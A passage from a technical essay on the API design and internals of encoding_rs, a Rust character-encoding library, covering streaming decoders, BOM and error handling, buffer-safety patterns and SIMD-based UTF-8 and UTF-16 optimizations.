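For contrast, here is a minimal sketch of a streaming decode with encoding_rs, illustrating a caller-allocated output buffer and the flag that marks the last buffer (it assumes encoding_rs as a Cargo dependency; the input is "ハロー" in Shift_JIS):

use encoding_rs::{CoderResult, SHIFT_JIS};

fn main() {
    // In a real stream this input would arrive split across several buffers.
    let input = b"\x83n\x83\x8d\x81[";

    let mut decoder = SHIFT_JIS.new_decoder();
    // The caller allocates the output; the worst case is queried from the decoder.
    let mut output =
        String::with_capacity(decoder.max_utf8_buffer_length(input.len()).unwrap());

    // `true` marks this as the last buffer, so a truncated trailing sequence
    // is replaced with U+FFFD rather than silently dropped or left pending.
    let (result, bytes_read, had_errors) = decoder.decode_to_string(input, &mut output, true);

    match result {
        CoderResult::InputEmpty => {} // all input was consumed
        CoderResult::OutputFull => unreachable!("output was sized for the worst case"),
    }
    assert_eq!(bytes_read, input.len());
    assert!(!had_errors);
    assert_eq!(output, "ハロー");
}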

Other Design Considerations

There are other API design considerations that would be unfair to label as “problems”, but that are still very relevant to designing a new API. These relate mainly to error handling and byte order mark (BOM) handling.

Replacement of Errors

It is typical for character encoding conversion APIs to treat error handling as a mode that is set on a converter object as opposed to treating error handling as a different API entry point. API-wise it makes sense to have different entry points in order to have different return values for the two cases. Specifically, when the converter handles errors, the status of the conversion call cannot be that conversion stopped on an error for the caller to handle. Additionally, when the converter handles errors, it may make sense to provide a flag that indicates whether there were errors even though they were automatically handled.

Implementation-wise, experience suggests that baking error handling into each converter complicates code considerably and adds opportunities for bugs. Making the converter implementation always signal errors, and having an optional wrapper that deals with those errors so that the application developer doesn’t need to, leads to a much cleaner design. This design is a natural match for exposing different entry points: one entry point goes directly to the underlying converter and the other goes through the wrapper.

BOM Handling

BOM sniffing is subtle enough that it is a bad idea to leave it to the application. It’s more robust to bake it into the conversion library. In particular, getting BOM sniffing right when bytes arrive one at a time is not trivial for applications to handle. Like replacement of errors, different BOM handling modes can be implemented as wrappers around the underlying converters.

Extensibility

Especially in languages that provide a notion of inheritance, interfaces or traits, it is alluring for the API designer to seek to define an abstract conversion API that others can write more converters for. However, in the case of the Web, the set of encodings is closed and includes only those that are defined in the Encoding Standard. As far as the use cases in the Web context go, extensibility is not needed. On the contrary, especially in a code base that is also used in a non-Web context (as Gecko is used in Thunderbird in the email context), it is a feature that, on the Web side, we can be confident that a type representing an encoding defined in the Encoding Standard can’t exhibit behaviors from outside the Encoding Standard. By design, encoding_rs is not extensible, so an encoding_rs Encoding does not represent any imaginable character encoding but instead represents a character encoding from the Encoding Standard. For example, we know from the type that we don’t accidentally have a UTF-7 decoder in Gecko code that has Web expectations even though Thunderbird contains a UTF-7 decoder in its codebase. (If you are interested in decoding email in Rust, there is a crate that wraps encoding_rs, adds UTF-7 decoding and maintains a type distinction between Web encodings and email encodings.)

Additionally, in the context of Rust and its Foreign Function Interface (FFI), it helps that references are references to plain structs and not trait objects. Whereas C++ puts a vtable pointer on the objects allowing pointers to polymorphic types to have the same size as C pointers, Rust’s type erasure puts the vtable pointer in the reference. A Rust reference to a struct has the same machine representation as a plain (non-null) C pointer. A Rust reference to a trait-typed thing is actually two pointers: one to the instance and another to the vtable appropriate for the concrete type of the instance. Since interoperability with C++ is a core design goal for encoding_rs, using the kind of types whose references are the same as C pointers avoids the problem of losing the vtable pointer when crossing the FFI boundary.

Iterators vs. Slices

Conceptually a character encoding is a mapping from a stream of bytes onto a stream of Unicode scalar values and, in most cases, vice versa. Therefore, it would seem that the right abstraction for a converter is an iterator adaptor that consumes an iterator over bytes and yields Unicode scalar values (or vice versa).

There are two problems with modeling character encoding converters as iterator adaptors. First, it leaves optimization to the compiler, when manual optimizations across runs of code units are desirable. Specifically, it is a core goal for encoding_rs to make ASCII handling fast using SIMD, and the compiler does not have enough information about the data to know to produce ASCII-sequence-biased autovectorization. Second, Rust iterators are ill-suited for efficient and (from the C perspective) idiomatic exposure over the FFI.

The API style of uconv, java.nio.charset, iconv, etc., of providing input and output buffers of several code units at a time to the converter is friendly both to SIMD and to FFI (Rust slices trivially decompose to pointer and length in C). While this isn’t 100% rustic like iterators, slices still aren’t unrustic.

The API Design

This finally brings us to the actual API. There are three public structs: Encoding, Decoder and Encoder. From the point of view of the application developer, these act like traits (or interfaces or superclasses to use concepts from other languages) even though they are structs. Instead of using language implementation-provided vtables for dynamic dispatch, they internally have an enum that wraps private structs that are conceptually like subclasses. The use of private enum for dispatch avoids vtable pointers in FFI, makes the hierarchy intentionally non-extensible (see above) and allows BOM sniffing to change what encoding a Decoder is a decoder for.

There is one statically allocated instance of Encoding for each encoding defined in the Encoding Standard. These instances have publicly visible names that allow application code to statically refer to a specific encoding (commonly, you want to do this with UTF-8, windows-1252, and the replacement encoding). To find an Encoding instance dynamically at runtime based on a label obtained from protocol text, there is a static method fn Encoding::for_label(label: &[u8]) -> &'static Encoding.

The Encoding struct provides convenience methods for non-streaming conversions. These are “convenience” methods in the sense that they are implemented on top of Decoder and Encoder. An application that only uses non-streaming conversions only needs to deal with Encoding and doesn’t need to use Decoder and Encoder at all.

Streaming API

Decoder and Encoder provide streaming conversions and are allocated at runtime, because they encapsulate state related to the streaming conversion. On the Encoder side, only ISO-2022-JP is actually stateful, so most of the discussion here will focus on Decoder.

Internally, the encoding-specific structs wrapped by Decoder are macroized to generate decode to UTF-8 and decode to UTF-16 from the same source code (likewise for Encoder). Even though Rust applications are expected to use the UTF-8 case, I’m going to give examples using the UTF-16 case, because it doesn’t involve the distinction between &str and &[u8] which would distract from the more important issues.

The fundamental function that Decoder provides is:
fn decode_to_utf16_without_replacement(
    &mut self,
    src: &[u8],
    dst: &mut [u16],
    last: bool
) -> (DecoderResult, usize, usize)

This function wraps BOM sniffing around an underlying encoding-specific implementation that takes the same arguments and has the same return value. The Decoder-provided wrapper first exposes the input to a BOM sniffing state machine and once the state machine gets out of the way delegates to the underlying implementation. Decoder instances can’t be constructed by the application directly. Instead, they need to be obtained from factory functions on Encoding. The factory functions come in three flavors for three different BOM sniffing modes: full BOM sniffing (the default), which may cause the Decoder to morph into a decoder for a different encoding than initially (using enum for dispatch shows its usefulness here!), BOM removal (no morphing but the BOM for the encoding itself is skipped) and without BOM handling. The struct is the same in all cases, but the different factory methods initialize the state of the BOM sniffing state machine differently.

The method takes an input buffer (src) and an output buffer (dst) both of which are caller-allocated. The method then decodes bytes from src into Unicode scalar values that are stored (as UTF-16) into dst until one of the following three things happens:

  1. A malformed byte sequence is encountered.
  2. All the input bytes have been processed.
  3. The output buffer has been filled so near capacity that the decoder cannot be sure that processing an additional byte of input wouldn’t cause so much output that the output buffer would overflow.

The return value is a tuple of a status indicating which one of the three reasons to return happened, how many input bytes were read and how many output code units were written. The status is a DecoderResult enumeration (possibilities Malformed, InputEmpty and OutputFull corresponding to the three cases listed above).

The output written into dst is guaranteed to be valid UTF-16, and the output after each call is guaranteed to consist of complete characters. (I.e. the code unit sequence for the last character is guaranteed not to be split across output buffers.) This implies that the output buffer must be long enough for an astral character to fit (two UTF-16 code units) and the output buffer might not be fully filled. While it may seem wasteful not to fill the last slot of the output buffer in the common case, this design significantly simplifies the implementation while also simplifying callers by guaranteeing to the caller that it won’t have to deal with split surrogate pairs.

The boolean argument last indicates that the end of the stream is reached when all the bytes in src have been consumed.

A Decoder object can be used to incrementally decode a byte stream. During the processing of a single stream, the caller must call the method zero or more times with last set to false and then call decode_* at least once with last set to true. If the decode_* with last set to true returns InputEmpty, the processing of the stream has ended. Otherwise, the caller must call decode_* again with last set to true (or treat a Malformed result as a fatal error).

Once the stream has ended, the Decoder object must not be used anymore. That is, you need to create another one to process another stream. Unlike with some other libraries that encourage callers to recycle converters that are expensive to create, encoding_rs guarantees that converters are extremely cheap to create. (More on this later.)

When the decoder returns OutputFull or the decoder returns Malformed and the caller does not wish to treat it as a fatal error, the input buffer src may not have been completely consumed. In that case, the caller must pass the unconsumed contents of src to the method again upon the next call.
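
For illustration, here is a minimal sketch (not from the encoding_rs documentation) of driving this protocol with the method above, treating any malformed sequence as a fatal error; the chunk iteration and the output buffer size are arbitrary choices:
fn decode_fatally(
    decoder: &mut encoding_rs::Decoder,
    chunks: &[&[u8]],
) -> Result<Vec<u16>, ()> {
    use encoding_rs::DecoderResult;
    let mut output = Vec::new();
    // The output buffer must have room for at least one astral character,
    // i.e. two UTF-16 code units; 1024 is an arbitrary choice.
    let mut buffer = [0u16; 1024];
    for (i, chunk) in chunks.iter().enumerate() {
        let last = i == chunks.len() - 1; // assumes at least one chunk
        let mut src: &[u8] = *chunk;
        loop {
            let (result, read, written) =
                decoder.decode_to_utf16_without_replacement(src, &mut buffer, last);
            output.extend_from_slice(&buffer[..written]);
            src = &src[read..];
            match result {
                DecoderResult::InputEmpty => break,    // feed the next chunk
                DecoderResult::OutputFull => continue, // reuse the output buffer
                DecoderResult::Malformed(_, _) => return Err(()), // fatal error
            }
        }
    }
    Ok(output)
}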

Typically the application doesn’t wish to do its own error handling and just wants errors to be replaced with the REPLACEMENT CHARACTER. For this use case, there is another method that wraps the previous method and provides the replacement. The wrapper looks like this:
fn decode_to_utf16(
    &mut self,
    src: &[u8],
    dst: &mut [u16],
    last: bool
) -> (CoderResult, usize, usize, bool)

Notably, the status enum is different, because the case of malformed sequences doesn’t need to be communicated to the application. Also, the return tuple includes a boolean flag to indicate whether there were errors.

Additionally, there is a method for querying the worst-case output size given the current state of the decoder and the length of an input buffer. If the length of the output buffer is at least the worst case, the decoder guarantees that it won’t return OutputFull.
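
As a sketch of how these pieces fit together (assuming the worst-case query is the max_utf16_buffer_length method, which returns None on arithmetic overflow, and with a Decoder obtained from one of the Encoding factory methods), a caller that sizes the output buffer to the worst case never needs to handle OutputFull:
fn decode_chunk_with_replacement(
    decoder: &mut encoding_rs::Decoder,
    chunk: &[u8],
    last: bool,
    output: &mut Vec<u16>,
) -> bool {
    use encoding_rs::CoderResult;
    // With a worst-case-sized buffer, the decoder guarantees not to return
    // OutputFull, so one call per chunk suffices.
    let worst_case = decoder.max_utf16_buffer_length(chunk.len()).unwrap();
    let start = output.len();
    output.resize(start + worst_case, 0);
    let (result, read, written, had_errors) =
        decoder.decode_to_utf16(chunk, &mut output[start..], last);
    assert!(matches!(result, CoderResult::InputEmpty));
    assert_eq!(read, chunk.len());
    output.truncate(start + written);
    had_errors // true if any malformed sequence was replaced with U+FFFD
}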

Identifying Malformed Sequences

Initially, the plan was simply not to support applications that need to identify which input bytes were in error, because I thought that it wasn’t possible to do so without complicating the API for everyone else. However, very early into the implementation phase, I realized that it is possible to identify which bytes are in error without burdening applications that don’t care if the applications that want to know are responsible for remembering the last N bytes decoded where N is relatively small. It turns out that N is 6.

For a malformed sequence that corresponds to a single decode error (i.e. a single REPLACEMENT CHARACTER) a DecoderResult::Malformed(u8, u8) is returned. The first wrapped integer indicates the length of the malformed byte sequence. The second wrapped integer indicates the number of bytes that were consumed after the malformed sequence. If the second integer is zero, the last byte that was consumed is the last byte of the malformed sequence. The malformed bytes may have been part of an earlier input buffer, which is why remembering the recently consumed bytes is the responsibility of the application that wants to identify the bytes that were in error.

The first wrapped integer can have values 1, 2, 3 or 4. The second wrapped integer can have values 0, 1, 2 or 3. The worst-case sum of the two is 6, which happens with ISO-2022-JP.
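
As a sketch of the bookkeeping (names are illustrative, not part of the API), if the caller tracks the total number of bytes it has handed to the decoder so far, the absolute position of the malformed sequence falls out of the two wrapped integers:
fn malformed_range(total_bytes_consumed: usize, length: u8, consumed_after: u8) -> (usize, usize) {
    // One past the last byte of the malformed sequence.
    let end = total_bytes_consumed - consumed_after as usize;
    // First byte of the malformed sequence; this index may point into a
    // previously processed input buffer, hence the need to remember up to
    // 6 recently consumed bytes.
    let start = end - length as usize;
    (start, end)
}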

Identifying Unmappable Characters

When encoding to an encoding other than UTF-8 (the Encoding Standard does not support encoding into UTF-16LE or UTF-16BE, and there is one Unicode scalar value that cannot be encoded into gb18030), it is possible that the encoding cannot represent a character that is being encoded. In this case, instead of returning backward-looking indices, EncoderResult::Unmappable(char) wraps the Unicode scalar value that needs to be replaced with a numeric character reference when performing replacement. In the case of ISO-2022-JP, this Unicode scalar value can be the REPLACEMENT CHARACTER instead of a value actually occurring in the input if the input contains U+000E, U+000F, or U+001B.
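
For example, an HTML-oriented caller performing replacement turns the wrapped scalar value into a decimal numeric character reference roughly like this (a sketch, not library-provided code):
fn numeric_character_reference(unmappable: char) -> String {
    // E.g. '€' becomes "&#8364;" when encoding to an encoding without '€'.
    format!("&#{};", unmappable as u32)
}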

This asymmetry between how errors are signaled in the decoder and encoder scenarios makes the signaling appropriate for each scenario instead of optimizing for consistency where consistency isn’t needed.

Non-Streaming API

As noted earlier, Encoding provides non-streaming convenience methods built on top of the streaming functionality. Instead of being simply wrappers for the streaming conversion, the non-streaming methods first try to check if the input is borrowable as output without conversion. For example, if the input is all ASCII and the encoding is ASCII-compatible, a Cow borrowing the input is returned. Likewise, the input is borrowed when the encoding is UTF-8 and the input is valid or when the encoding is ISO-2022-JP and the input contains no escape sequences. Here’s an example of a non-streaming conversion method:
fn decode_with_bom_removal<'a>(
    &'static self,
    bytes: &'a [u8]
) -> (Cow<'a, str>, bool)

(Cow is a Rust standard library type that wraps either an owned type or a corresponding borrowed type, so a heap allocation and copy can be avoided if the caller only needs a borrow. E.g., Cow<'a, str> wraps either a heap-allocated string or a pointer and a length designating a string view into memory owned by someone else. Lifetime 'a indicates that the lifetime of borrowed output depends on the lifetime of the input.)
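
A minimal usage sketch of the method above (UTF_8 being the statically allocated Encoding instance for UTF-8):
use encoding_rs::UTF_8;

fn print_decoded(bytes: &[u8]) {
    let (text, had_errors) = UTF_8.decode_with_bom_removal(bytes);
    // For valid UTF-8 input, `text` is a Cow::Borrowed view into `bytes`;
    // otherwise a new String is allocated and malformed sequences are
    // replaced with U+FFFD, which `had_errors` reports.
    if had_errors {
        eprintln!("input contained malformed sequences");
    }
    println!("{}", text);
}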

Internals

Internally, there are five guiding design principles.

  1. For the legacy CJK encodings the conversions to and from UTF-8 and UTF-16 should come from the same source code instead of being implemented twice. (For the UTFs and for single-byte encodings, there are enough optimization opportunities from having two implementations that it doesn’t make sense to keep those unified for the sake of unification.)
  2. Since Web content is either markup, which is runs of ASCII mixed with runs of potentially non-ASCII, or CSS and JS, which are almost entirely ASCII, handling of the ASCII range should be very fast and use SIMD where possible.
  3. Small binary size matters more than the speed of encode into legacy encodings.
  4. For performance, everything should be inlined into the conversion loop. (This rules out abstractions that would involve virtual calls from within the conversion loop.)
  5. The instantiation of converters should be very efficient—just a matter of initializing a few machine words. The instantiation should not read from the file system (other than the system lazily paging in the binary for encoding_rs itself), run decompression algorithms, allocate memory on the heap or compute derived lookup tables from other lookup tables.

Abstracting over UTF-8 and UTF-16

Even though in principle compile-time abstraction over UTF-8 and UTF-16 is a matter of monomorphizing over u8 and u16, handling the two cases using generics would be more complicated than handling them using macros. That’s why it’s handled using macros. The conversion algorithms are written as blocks of code that are inputs to macros that expand to provide the skeleton conversion loop and fill in the encoding-specific blocks of code. In the skeleton in the decode case, one instantiation uses a Utf8Destination struct and another uses a Utf16Destination struct both of which provide the same API for writing into them. In the encode case, the source struct varies similarly.
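
A much-simplified sketch of the idea (the real encoding_rs macros and destination structs are considerably more involved; the types below are stand-ins): the same block of encoding-specific code is pasted by a macro into one function that writes UTF-8 and another that writes UTF-16:
struct Utf8Destination { bytes: Vec<u8> }
struct Utf16Destination { units: Vec<u16> }

impl Utf8Destination {
    fn write_ascii(&mut self, byte: u8) { self.bytes.push(byte); }
}

impl Utf16Destination {
    fn write_ascii(&mut self, byte: u8) { self.units.push(byte as u16); }
}

// The macro provides the skeleton; the caller provides the per-byte block.
macro_rules! decoder_fns {
    ($fn8:ident, $fn16:ident, $src:ident, $dest:ident, $code:block) => {
        fn $fn8($src: &[u8], $dest: &mut Utf8Destination) $code
        fn $fn16($src: &[u8], $dest: &mut Utf16Destination) $code
    };
}

decoder_fns!(decode_to_utf8, decode_to_utf16, src, dest, {
    for &byte in src {
        if byte < 0x80 {
            dest.write_ascii(byte);
        }
        // Non-ASCII handling elided; it would call further methods that both
        // destination types provide under the same names.
    }
});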

Using Rust Lifetimes to Match Buffer Accesses to Space Checks

The old code in uconv was relatively ad hoc in how it accessed the input and output buffers. It maybe did stuff, advanced some pointers, checked if the pointers reached the end of the buffer and maybe even backed off a bit in some places. It didn’t have an overarching pattern to how space availability was checked and matched to memory accesses so that no accesses could happen without a space check having happened first. For encoding_rs, I wanted to make sure that buffer access only goes forwards without backtracking more than the one byte that might get unread in error cases and that no read happens without checking that there is still data to be read and no write happens without checking that there is space in the output buffer.

Rust’s lifetimes can be used to enforce an “at most once” property. Immediately upon entering a conversion function, the input and output slices are wrapped in source and destination structs that maintain the current read or write position. I’ll use the write case as the example, but the read case works analogously. A decoder that only ever produces characters in the basic multilingual plane uses a BMP space checking method on the destination that takes the destination as a mutable reference (&mut self). If the destination is a UTF-8 destination, the method checks that there is space for at least three additional bytes. If the destination is a UTF-16 destination, the method checks that there is space for at least one additional code unit. If there is enough space, the caller receives a BMP handle whose lifetime is tied to the lifetime of the destination due to the handle containing the mutable reference to the destination. A mutable reference in Rust means exclusive access. Since a mutable reference to the destination is hidden inside the handle, no other method can be called on the destination until the handle goes out of scope. The handle provides a method for writing one BMP scalar value. That method takes the handle’s self by value consuming the handle and preventing reuse.

The general concept is that at the top of the loop, the conversion loop checks availability of data at the source and obtains a read handle or returns from the conversion function with InputEmpty and then checks availability of space at the destination and obtains a write handle or returns from the conversion function with OutputFull. If neither check caused a return out of the conversion function, the conversion loop now hasn’t read or written either buffer but can be fully confident that it can successfully read from the input at most once and write a predetermined amount of units to the output at most once during the loop body. The handles go out of scope at the end of the loop body, and once the loop starts again, it’s time to check for input availability and output space availability again.
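
A simplified sketch of the pattern for the UTF-16 destination (the real types also have UTF-8 counterparts and handles for more than just BMP writes; names here are illustrative):
struct Utf16Destination<'a> {
    slice: &'a mut [u16],
    pos: usize,
}

struct BmpHandle<'a, 'b> {
    dest: &'a mut Utf16Destination<'b>,
}

impl<'b> Utf16Destination<'b> {
    // The space check: hands out a write handle only if one more code unit
    // fits. The handle borrows the destination mutably, so nothing else can
    // touch the destination while the handle is alive.
    fn check_space_bmp<'a>(&'a mut self) -> Option<BmpHandle<'a, 'b>> {
        if self.pos < self.slice.len() {
            Some(BmpHandle { dest: self })
        } else {
            None // the conversion loop returns OutputFull
        }
    }
}

impl<'a, 'b> BmpHandle<'a, 'b> {
    // Writing takes `self` by value, consuming the handle: at most one
    // write per successful space check.
    fn write_bmp(self, c: char) {
        debug_assert!((c as u32) < 0x1_0000);
        self.dest.slice[self.dest.pos] = c as u16;
        self.dest.pos += 1;
    }
}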

As an added twist, the read operation yields not only a byte of input but also an unread handle for unreading it, because in various error cases the spec calls for prepending input that was already read back to the input stream. In practice, all the cases in the spec can be handled by being able to unread at most one unit of input even though the spec text occasionally prepends more than one unit.

Optimizing ASCII and Multibyte Sequences

In practice, the ISO-2022-JP converters, which don’t need to be fast for Web use cases, use the above concept in its general form. For the ASCII-compatible encodings that are actually performance-relevant for Web use cases, there are a couple of elaborations.

First, the UTF-8 destination and the UTF-16 destination know how to copy ASCII from a byte source in an efficient way that handles more than one ASCII character per register (either a SIMD register or even an ALU register). So the main conversion loop starts with a call to a method that first tries to copy ASCII from the source to the destination and then returns a non-ASCII byte and a write handle if there’s space left in the destination. Once a non-ASCII byte is found, another loop is entered into that actually works with the handles.

Second, the loop that works with the handles doesn’t have a single scope per loop body for multi-byte encodings. Once we’re done copying ASCII, the non-ASCII byte that we found is always a lead byte of a multi-byte sequence unless there is an error—and we are optimizing for the case where there is neither an error nor a buffer boundary. Therefore, it makes sense to start another scope that does the handle-obtaining space check choreography again in the hope that the next byte will be a valid trail byte given the lead byte that we just saw. Then there is a third, innermost loop for reading the next byte after that. If that byte is non-ASCII, we can continue the middle loop as if this non-ASCII byte had come from the end of the initial ASCII fast path. If the byte is ASCII punctuation, we can spin in the innermost loop without trying to handle a longer ASCII run using SIMD, which would likely fail within CJK plain text. However, if we see non-punctuation ASCII, we can continue the outermost loop and go back to the ASCII fast path.

Not matching on a state variable indicating whether we’re expecting a lead or trail byte on a per-byte basis and instead using the program counter for the state distinguishing between lead and trail byte expectations is good for performance. However, it poses a new problem: What if the input buffer ends in the middle of a multi-byte sequence? Since we are using the program counter for state, the code for handling the trail byte in a two-byte encoding is only reachable by first executing the code for handling the lead byte, and since Rust doesn’t have goto or a way to store continuations, after a buffer boundary we can’t just restore the local variables and jump directly to the trail byte handling. To deal with this, the macro structure that allows the reuse of code for decoding both to UTF-8 and to UTF-16 also duplicates the block for handling the trail byte such that the same block occurs between the method entry and the conversion loop. If the previous buffer ended in the middle of a byte sequence, the next call to the conversion function handles the trail of that sequence before entering the actual conversion loop.

Optimizing UTF-8

The UTF-8 decoder does not use the same structure as the other multi-byte decoders. Dealing with invalid byte sequences in the middle of the buffer or valid byte sequences that cross a buffer boundary is implemented naïvely from the spec in a way that is instantiated via macro from the same code both when converting to UTF-8 and when converting to UTF-16. However, once that outer tier of conversion gets to a state where it expects the next UTF-8 byte sequence, it calls into fast-track code that only deals with valid UTF-8 and returns back to the outer tier that’s capable of dealing with invalid UTF-8 or partial sequences when it discovers an incomplete sequence at the end of the buffer or an invalid sequence in the middle. This inner fast track is implemented separately for decoding UTF-8 to UTF-8 and for decoding UTF-8 to UTF-16.

The UTF-8 to UTF-16 case is close enough to what one might expect from the above description of the legacy multibyte encodings. At the top of the loop, there is the call to the ASCII fast path that zero-extends ASCII to UTF-16 Basic Latin multiple code units at a time, and then byte sequences that start with a non-ASCII lead byte are handled as three cases: two-byte sequence, three-byte sequence or four-byte sequence. Lookup tables are used to check the validity of the combination of lead byte and second byte as explained below. The sequence is considered consumed only if it’s found to be valid. The corresponding UTF-16 code units are then written to the destination as normal u16 writes.

The UTF-8 to UTF-8 case is different. The input is read twice, but the writing is maximally efficient. First, a UTF-8 validation function is run on the input. This function only reads and doesn’t write and uses an ASCII validation fast path that checks more than one code unit at a time using SIMD or multiple code units per ALU word. The UTF-8 validation function is the UTF-8 to UTF-16 conversion function with all the writes removed. After the validation, the valid UTF-8 run is copied to the destination using std::ptr::copy_nonoverlapping(), which is the Rust interface to LLVM memcpy(). This way, the writing, which is generally less efficient than reading, can be done maximally efficiently instead of being done on a byte-by-byte basis for non-ASCII as would result from a read-once implementation. (Note that in the non-streaming case when the input is valid, both the second read and the writing are avoided. More on that later.)

It is not totally clear if this kind of double-reading is smart, since it is a pessimization for the 100% ASCII case. Intuitively, it should help the non-ASCII case, since even the non-ASCII parts can be written using SIMD. However, 100% ASCII UTF-8 to UTF-8 streaming case, which copies instead of borrowing, runs on Haswell at about two thirds of memcpy() speed while the 100% ASCII windows-1252 to UTF-8 case (which writes the SIMD vectors right away without re-reading) runs at about memcpy() speed.

The hard parts of looping over potentially-invalid UTF-8 are:

  • Minimizing the performance impact of deciding if the lead byte is valid
  • Minimizing the performance impact of deciding if the second byte is valid considering that its valid range depends on the lead byte
  • Avoiding misprediction of the length of the byte sequence representing the next scalar value.

encoding_rs combines the solution for the first two problems. Once it’s known that the lead byte is not ASCII, the lead byte is used as an index to a lookup table that yields a byte whose lower two bits are always zero and that has exactly one of the other six bits set to represent the following cases:

  • Byte is not a legal lead byte.
  • Lead byte is associated with a normal-range second byte.
  • Lead byte for a three-byte sequence requires special lower bound for second byte.
  • Lead byte for a three-byte sequence requires special upper bound for second byte.
  • Lead byte for a four-byte sequence requires special lower bound for second byte.
  • Lead byte for a four-byte sequence requires special upper bound for second byte.

The second byte is used as an index to a lookup table yielding a byte whose low two bits are always zero, whose bit in the position corresponding to the lead being illegal is always one and whose other five bits are zero if the second byte is legal given the type of lead the bit position represents and one otherwise. When the bytes from the two lookup tables are ANDed together, the result is zero if the combination of lead byte and second byte is legal and non-zero otherwise.

When a trail byte is always known to have the normal range, as the third byte in a three-byte sequence is, we can check that the most significant bit is 1 and the second-most significant bit is zero. Note how the ANDing described in the above paragraph always leaves the two least-significant bits of the AND result as zeros. We shift the third byte of a three-byte sequence right by six and OR it with the AND result from the previous paragraph. Now the validity of the three-byte sequence can be decided in a single branch: If the result is 0x2, the sequence is valid. Otherwise, it’s invalid.

In the case of four-byte sequences, the number computed per above is extended to 16 bits and the two most-significant bits of the fourth byte are masked and shifted to bit positions 8 and 9. Now the validity of the four-byte sequence can be decided in a single branch: If the result is 0x202, the sequence is valid. Otherwise, it’s invalid.

The fast path checks that there are at least 4 bytes of input on each iteration, so the bytes of any valid byte sequence for a single scalar value can be read without further bound checks. The code does use branches to decide whether to try to match the bytes as a two-byte, three-byte or four-byte sequence. I tried to handle the distinction between two-byte sequences and three-byte sequences branchlessly when converting UTF-8 to UTF-16. In that attempt, the mask applied to the lead byte was taken from a lookup table, another lookup provided a mask for zeroing out the bits of the third byte in the two-byte case, and a third lookup provided the shift amount (6 or 0). The result was slower than just having a branch to distinguish between two-byte sequences and three-byte sequences.

Now that there is branching to categorize the sequence length, it becomes of interest to avoid that branching. It’s also of interest to avoid going back to the SIMD ASCII fast path when the next lead is not ASCII. After a non-ASCII byte sequence, instead of looping back to the ASCII fast path, the next byte is read and checked. After a two-byte sequence, the next lead is checked for ASCIIness. If it’s not ASCII, the code loops back to the point where the SIMD ASCII path has just exited. I.e. there’s a non-ASCII byte as when exiting the ASCII SIMD fast path, but its non-ASCIIness was decided without SIMD. If the byte is an ASCII byte, it is processed and then the code loops back to the ASCII SIMD fast path.

Obviously, this is far from ideal. Avoiding immediate return to ASCII fast path after a two-byte character works within a non-Latin-script word but it doesn’t really help to let one ASCII character signal a return to SIMD when the one ASCII character is a single space between two non-Latin words. Unfortunately, trying to be smarter about avoiding too early looping back to the SIMD fast path would mean more branching, which itself has a cost.

In the two-byte case, if the next lead is non-ASCII, looping back to immediately after the exit from the ASCII fast path means that the next branch is anyway the branch to check if the lead is for a two-byte sequence, so this works out OK for words in non-Latin scripts in the two-byte-per-character part of the Basic Multilingual Plane. In the three-byte case, however, looping back to the point where the ASCII SIMD fast path ends would first run the check for a two-byte lead even though after a three-byte sequence the next lead is more likely to be for another three-byte sequence. Therefore, after a three-byte sequence, the first check performed on the next lead is to see if it, too, is for a three-byte sequence, in which case the code loops back to the start of the three-byte sequence processing code.

Optimizing UTF-16LE and UTF-16BE

UTF-16LE and UTF-16BE are rare enough on the Web that a browser can well get away with a totally naïve and slow from-the-spec implementation. Indeed, that’s what landed in Firefox 56. However, when talking about encoding_rs, it was annoying to always have the figurative asterisk next to UTF-16LE and UTF-16BE to disclose slowness when the rest was fast. To get rid of the figurative asterisk, UTF-16LE and UTF-16BE decode is now optimized, too.

If you read The Unicode Standard, you might be left with the impression that the difference between UTF-16 as an in-memory Unicode representation and UTF-16 as an interchange format is byte order. This is not the full story. There are three additional concerns. First, there is the concern of memory alignment. In the case of UTF-16 as an in-memory Unicode representation, a buffer of UTF-16 code units is aligned to start at a memory address that is a multiple of the size of the code unit. That is, such a buffer always starts at an even address. When UTF-16 as an interchange format is read using a byte-oriented I/O interface, it may happen that a buffer starts at an odd address. Even on CPU architectures that don’t distinguish between aligned and unaligned 16-bit reads and writes on the ISA layer, merely reinterpreting a pointer to bytes starting at an odd address as a pointer pointing to 16-bit units and then accessing it as if it were a normal buffer of 16-bit units is Undefined Behavior in C, C++, and Rust (as can in practice be revealed by autovectorization performed on the assumption of correct alignment). Second, there is the concern of buffers being an odd number of bytes in length, so special logic is needed to handle the split UTF-16 code unit at the buffer boundary. Third, there is the concern of unpaired surrogates, so even when decoding to UTF-16, the input can’t just be copied into right alignment, potentially with byte order swapping, without inspecting the data.

The structure of the UTF-16LE and UTF-16BE decoders is modeled on the structure of the UTF-8 decoders: There’s a naïve from-the-spec outer tier that deals with invalid and partial sequences and an inner fast path that only deals with valid sequences.

At the core of the fast path is a struct called UnalignedU16Slice that wraps *const u8, i.e. a pointer that can point to either an even or an odd address, and a length in 16-bit units. It provides a way to make the unaligned slice one code unit shorter (to exclude a trailing high surrogate when needed), a way to take a tail subslice and ways to read a u16 or, if SIMD is enabled, u16x8 in a way that assumes the slice might not be aligned. It also provides a way to copy, potentially with endianness swapping, Basic Multilingual Plane code units to a plain aligned &mut [u16] until the end of the buffer or a surrogate code unit is reached. If SIMD is enabled, both the endianness swapping and the surrogate check are SIMD-accelerated.

When decoding to UTF-16, there’s a loop that first tries to use the above-mentioned Basic Multilingual Plane fast path and, once a surrogate is found, handles the surrogates on a per-code-unit basis and returns back to the top of the loop if there was a valid pair.

When decoding to UTF-8, code copied and pasted from the UTF-16 to UTF-8 encoder is used. The difference is that instead of using &[u16] as the source, the source is an UnalignedU16Slice and, additionally, reads are followed with potential endian swapping. Additionally, unpaired surrogates are reported as errors in decode while UTF-16 to UTF-8 encode silently replaces unpaired surrogates with the REPLACEMENT CHARACTER. If SIMD is enabled, SIMD is used for the ASCII fast path. Both when decoding to UTF-8 and when decoding to UTF-16, endianness swapping is represented by a trait parameter, so the conversions are monomorphized into two copies: One that swaps endianness and one that doesn’t. This results in four conversion functions: Opposite-endian UTF-16 to UTF-8, same-endian UTF-16 to UTF-8, opposite-endian UTF-16 to UTF-16, same-endian UTF-16 to UTF-16. All these assume the worst for alignment. That is, code isn’t monomorphized for the aligned and unaligned cases. Unaligned access is fast on aarch64 and on the several most recent x86_64 microarchitectures, so optimizing performance of UTF-16LE and UTF-16BE in the aligned case for Core2 Duo-era x86_64 or for ARMv7 at the expense of binary size and source code complexity would be a bit too much considering that UTF-16LE and UTF-16BE performance doesn’t even really matter for Web use cases.

Optimizing x-user-defined

